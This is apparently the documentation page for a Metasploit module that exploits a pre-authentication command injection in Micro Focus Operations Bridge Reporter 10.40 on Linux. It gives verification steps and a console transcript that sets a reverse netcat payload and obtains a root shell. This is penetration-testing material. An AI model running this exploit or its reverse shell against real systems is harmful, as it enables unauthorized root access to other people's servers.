cgranleese-r7
2.0 KiB
2.0 KiB
Vulnerable Application
This module exploits a command injection vulnerability on login (yes, you read that right) that affects Micro Focus Operations Bridge Reporter on Linux, versions 10.40 and below. It's a straight up command injection, with little escaping required and it works before authentication. This module has been tested on the Linux 10.40 version. Older versions might be affected, check the advisory for details.
Installation docs are available at:
Vulnerable versions of the software can be downloaded from Micro Focus website by requesting a demo. This vulnerability only affects Linux installations.
All details about this vulnerability can be obtained from the advisory:
Verification Steps
- Install the application
- Start msfconsole
use exploit/multi/http/microfocus_obr_cmd_injectionset payload PAYLOADset rhost TARGETset lhost YOUR_IPrun- You should get a shell.
Scenarios
msf > use exploit/linux/http/microfocus_obr_cmd_injection
msf exploit(linux/http/microfocus_obr_cmd_injection) > set payload payload/cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf exploit(linux/http/microfocus_obr_cmd_injection) > set rhost 10.0.0.10
rhost => 10.0.0.10
msf exploit(linux/http/microfocus_obr_cmd_injection) > set lhost 10.0.0.1
lhost => 10.0.0.1
msf exploit(linux/http/microfocus_obr_cmd_injection) > run
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.10:21412 - Payload sent, now wait for Shelly, if she doesn't arrive try again!
[*] Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.10:51806) at 2021-04-23 20:57:02 +0700
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_service_t:s0
uname -a
Linux centos7 3.10.0-1062.18.1.el7.x86_64 #1 SMP Tue Mar 17 23:49:17 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux